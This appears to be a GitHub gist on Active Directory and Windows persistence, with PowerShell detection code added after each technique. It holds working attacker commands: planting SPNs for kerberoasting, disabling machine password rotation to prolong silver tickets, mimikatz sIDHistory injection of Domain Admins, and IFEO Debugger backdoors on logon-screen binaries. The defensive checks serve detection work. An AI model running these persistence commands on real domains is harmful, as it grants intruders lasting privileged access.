@vestjoe
Last active August 26, 2019 17:46

Misc persistence techniques

Set User SPN for future kerberoast attacks

Set an SPN on a user account you control now, so that if the account's password is later changed you can still request a service ticket for that SPN and kerberoast the new password offline. The SPN does not have to point at a real host or service; it only has to be unique in the forest (setspn -S checks for duplicates before adding it).

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname  
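
The check a defender runs against this: list every user account that carries an SPN and flag the privileged ones, so an SPN that appears on an admin account after the fact stands out. This is an added example, not code from the gist; it assumes a domain-joined host with a reachable DC. The LDAP filter and attribute names are standard Active Directory, the function name and the `Privileged` heuristic are this example's own.

```powershell
# Added example (not from the original gist). Enumerates user accounts in the
# current domain that carry a servicePrincipalName, i.e. the accounts a future
# kerberoast (including one set up with setspn -S) will target.
function Find-KerberoastableUsers {
    param(
        # Only return accounts whose password is older than this many days
        [int]$MinPasswordAgeDays = 0
    )
    # Person objects (not computers) with at least one SPN, not disabled
    # (userAccountControl bit 2), and not krbtgt, which always carries kadmin/changepw.
    $filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
              '(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(sAMAccountName=krbtgt)))'
    $searcher = [adsisearcher]$filter
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@(
        'samaccountname', 'serviceprincipalname', 'pwdlastset', 'admincount', 'whenchanged'))

    foreach ($r in $searcher.FindAll()) {
        # pwdLastSet is a FILETIME large integer; 0 means "never set"
        $lastSet = [datetime]::FromFileTimeUtc([int64]$r.Properties['pwdlastset'][0])
        $ageDays = [int]((Get-Date).ToUniversalTime() - $lastSet).TotalDays
        if ($ageDays -lt $MinPasswordAgeDays) { continue }
        $adminCount = 0
        if ($r.Properties['admincount'].Count -gt 0) { $adminCount = [int]$r.Properties['admincount'][0] }
        [pscustomobject]@{
            SamAccountName  = [string]$r.Properties['samaccountname'][0]
            SPNs            = @($r.Properties['serviceprincipalname'] | ForEach-Object { [string]$_ })
            PasswordAgeDays = $ageDays
            # adminCount=1 means the account is (or was) in a protected group; an SPN
            # on such an account is exactly the persistence case described above
            Privileged      = ($adminCount -eq 1)
            WhenChanged     = $r.Properties['whenchanged'][0]
        }
    }
}

# Highest-value hits first. Diff the output against the previous run to catch a newly added SPN.
Find-KerberoastableUsers | Sort-Object -Property Privileged, PasswordAgeDays -Descending |
    Format-Table SamAccountName, Privileged, PasswordAgeDays, SPNs -AutoSize
```

Remove an unwanted SPN with `setspn -D <spn> <account>`. On the DC side, a kerberoast shows up as event 4769 (service ticket requested) with ticket encryption type 0x17 (RC4) for a user account's SPN, which is worth alerting on regardless of this check.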

Extend Silver Ticket Lifetime

  1. Create Silver Ticket
  2. Extend the lifetime past the default 30 days

A forged silver ticket stays usable only as long as the key it was encrypted with (the computer account's password hash) stays the same. By default the machine rotates that password every 30 days, which silently invalidates the ticket; the two Netlogon values below stop the rotation.

HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1

Stops the Netlogon service on the host from changing its machine account password

HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge

Sets how often the machine account password is rotated, in days (default 30)

Both values are also exposed as Group Policy settings ("Domain member: Disable machine account password changes" and "Domain member: Maximum machine account password age"), so a manual registry edit is overwritten at the next policy refresh if a GPO sets them.
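
The following is an added example, not code from the gist. It reads the two Netlogon values, compares them with `pwdLastSet` on the host's computer object in AD (the rotation is client-initiated, so the DC never expires a machine password on its own; a key that has not rotated for longer than `MaximumPasswordAge` is the signal), and includes the persistence side as a separate function. It assumes a domain-joined host, local admin for the write, and PowerShell 5.1+; the function names and the `RotationSuppressed` rule are this example's own.

```powershell
# Added example (not from the original gist). Inspects and, optionally, pins the
# machine account password rotation that would otherwise invalidate a silver ticket.
$NetlogonParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'

function Get-MachinePasswordRotation {
    $p = Get-ItemProperty -Path $NetlogonParams
    # Absent values mean the defaults: rotation enabled, every 30 days
    $disabled = if ($null -eq $p.DisablePasswordChange) { 0 } else { [int]$p.DisablePasswordChange }
    $maxAge   = if ($null -eq $p.MaximumPasswordAge)   { 30 } else { [int]$p.MaximumPasswordAge }

    # pwdLastSet lives on the DC; look up this host's own computer object
    $searcher = [adsisearcher]"(&(objectCategory=computer)(sAMAccountName=$env:COMPUTERNAME`$))"
    [void]$searcher.PropertiesToLoad.Add('pwdlastset')
    $lastSet = $null
    $r = $searcher.FindOne()
    if ($r) { $lastSet = [datetime]::FromFileTimeUtc([int64]$r.Properties['pwdlastset'][0]) }

    $stale = $false
    if ($lastSet) { $stale = ((Get-Date).ToUniversalTime() - $lastSet).TotalDays -gt $maxAge }

    [pscustomobject]@{
        DisablePasswordChange = $disabled
        MaximumPasswordAge    = $maxAge
        PasswordLastSet       = $lastSet
        # Any of: rotation switched off, age raised above the default, or the
        # DC-side timestamp already older than the configured age
        RotationSuppressed    = ($disabled -eq 1) -or ($maxAge -gt 30) -or $stale
    }
}

# Persistence side: the two values from the text, written as DWORDs.
# MaxAgeDays = 0 leaves MaximumPasswordAge untouched (DisablePasswordChange alone is enough).
function Disable-MachinePasswordRotation {
    param([int]$MaxAgeDays = 0)
    Set-ItemProperty -Path $NetlogonParams -Name DisablePasswordChange -Value 1 -Type DWord
    if ($MaxAgeDays -gt 0) {
        Set-ItemProperty -Path $NetlogonParams -Name MaximumPasswordAge -Value $MaxAgeDays -Type DWord
    }
}

# Check only; run Disable-MachinePasswordRotation deliberately, not from this script.
Get-MachinePasswordRotation
```

Run the check fleet-wide and alert on `RotationSuppressed`; for hosts that legitimately have rotation disabled (some clustered or imaged systems do), the computer object's `pwdLastSet` should still be compared with the policy you expect, because the forged ticket is valid for exactly as long as that password is.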

Sid History Injection

Reference: https://adsecurity.org/?page_id=1821

sid::patch runs on a domain controller and patches the NTDS service so the otherwise protected sIDHistory attribute accepts writes; sid::add then appends the SID of the /new principal to the sIDHistory of the /sam object, which inherits that principal's access without being a member of it.

mimikatz sid::patch
mimikatz sid::add /sam:karl.watkins /new:"Domain Admins"
mimikatz sid::add /sam:"Domain Users" /new:"Domain Admins"
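
The check for this, as an added example that is not part of the gist: list every object with a populated sIDHistory and flag the two patterns an injection with sid::add leaves behind, a history SID from the account's own domain (a real migration always brings SIDs from a source domain, never the current one) and a privileged RID. It assumes a domain-joined host and PowerShell 5.1+; the privileged-RID table, the same-domain rule and the function names are this example's own.

```powershell
# Added example (not from the original gist). Finds sIDHistory entries that look injected.
$PrivilegedRids = @{
    '512' = 'Domain Admins'; '519' = 'Enterprise Admins'; '518' = 'Schema Admins'
    '516' = 'Domain Controllers'; '544' = 'Administrators'
}

# Pure classification step, separated so it can be exercised without a directory
function Test-SidHistoryEntry {
    param(
        [Parameter(Mandatory)][System.Security.Principal.SecurityIdentifier]$ObjectSid,
        [Parameter(Mandatory)][System.Security.Principal.SecurityIdentifier]$HistorySid
    )
    $rid = $HistorySid.Value.Split('-')[-1]
    [pscustomobject]@{
        HistorySid   = $HistorySid.Value
        PrivilegedAs = $PrivilegedRids[$rid]          # $null when the RID is not in the table
        # AccountDomainSid is $null for BUILTIN SIDs such as S-1-5-32-544; those can never
        # come from a migration either, so treat them as same-domain
        SameDomain   = ($null -eq $HistorySid.AccountDomainSid) -or
                       ($HistorySid.AccountDomainSid -eq $ObjectSid.AccountDomainSid)
    }
}

function Find-SidHistoryInjection {
    $searcher = [adsisearcher]'(sIDHistory=*)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'objectsid', 'sidhistory'))
    foreach ($r in $searcher.FindAll()) {
        # objectSid and sIDHistory come back as raw binary SIDs
        $own = [System.Security.Principal.SecurityIdentifier]::new([byte[]]$r.Properties['objectsid'][0], 0)
        foreach ($raw in $r.Properties['sidhistory']) {
            $hist  = [System.Security.Principal.SecurityIdentifier]::new([byte[]]$raw, 0)
            $entry = Test-SidHistoryEntry -ObjectSid $own -HistorySid $hist
            $name  = '<unresolved>'   # SIDs from a decommissioned source domain will not resolve
            try { $name = $hist.Translate([System.Security.Principal.NTAccount]).Value } catch { }
            [pscustomobject]@{
                SamAccountName = [string]$r.Properties['samaccountname'][0]
                HistorySid     = $entry.HistorySid
                ResolvesTo     = $name
                PrivilegedAs   = $entry.PrivilegedAs
                SameDomain     = $entry.SameDomain
                Suspicious     = $entry.SameDomain -or ($null -ne $entry.PrivilegedAs)
            }
        }
    }
}

Find-SidHistoryInjection | Where-Object Suspicious | Format-Table -AutoSize
```

The second sid::add line in the text (Domain Admins into the sIDHistory of Domain Users) is caught by the privileged-RID rule on a group object, which is why the filter is not restricted to users. On the DC, the write itself is logged as event 4765 (SID History was added to an account), and 4766 when the attempt fails.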

Oldies but goodies

Image File Execution Options (IFEO) Debugger

# Accessibility binaries that Winlogon launches from the logon/lock screen. Whatever is in
# their Debugger value is started in their place (with the original command line appended).
$bins = @("sethc.exe", "utilman.exe", "osk.exe", "Magnify.exe", "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe")
foreach($binname in $bins) {
    $key = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname"
    # -Force: do not fail if the key or the Debugger value already exists
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name "Debugger" -PropertyType String -Force -Value 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("Follow @cptjesus on twitter")' | Out-Null
}
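
The matching check, as an added example that is not part of the gist: enumerate every IFEO subkey with a Debugger value in both the native and the WOW6432Node hive, mark the ones that belong to the logon-screen binaries above, and offer a targeted removal. It assumes PowerShell 5.1+ and local admin for the removal; the function names and the `LogonScreen` flag are this example's own.

```powershell
# Added example (not from the original gist). Audits IFEO Debugger values.
$IfeoRoots = @(
    'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)
# Same list as the persistence snippet, lower-cased for comparison
$LogonScreenBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe',
                       'narrator.exe', 'displayswitch.exe', 'atbroker.exe'

function Get-IfeoDebugger {
    foreach ($root in $IfeoRoots) {
        # Every subkey is an image name; only those with a Debugger value matter here
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
            $debugger = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
            if ($debugger) {
                [pscustomobject]@{
                    Image       = $_.PSChildName
                    Debugger    = $debugger
                    LogonScreen = $LogonScreenBinaries -contains $_.PSChildName.ToLowerInvariant()
                    Key         = $_.PSPath -replace '^Microsoft\.PowerShell\.Core\\Registry::', ''
                }
            }
        }
    }
}

# Removes only the Debugger value, leaving other legitimate IFEO settings for the image alone
function Remove-IfeoDebugger {
    param([Parameter(Mandatory)][string]$Image)
    foreach ($root in $IfeoRoots) {
        $key = Join-Path $root $Image
        if (Test-Path $key) {
            Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
        }
    }
}

# Report first; a Debugger on a logon-screen binary has no legitimate use on a production host
Get-IfeoDebugger | Sort-Object LogonScreen -Descending | Format-Table Image, LogonScreen, Debugger -AutoSize
```

Developer tooling does set Debugger values on specific images (a JIT debugger registered for one executable, for instance), so flag everything and remove on review rather than blindly; an entry for any of the seven logon-screen binaries is the one case that needs no review.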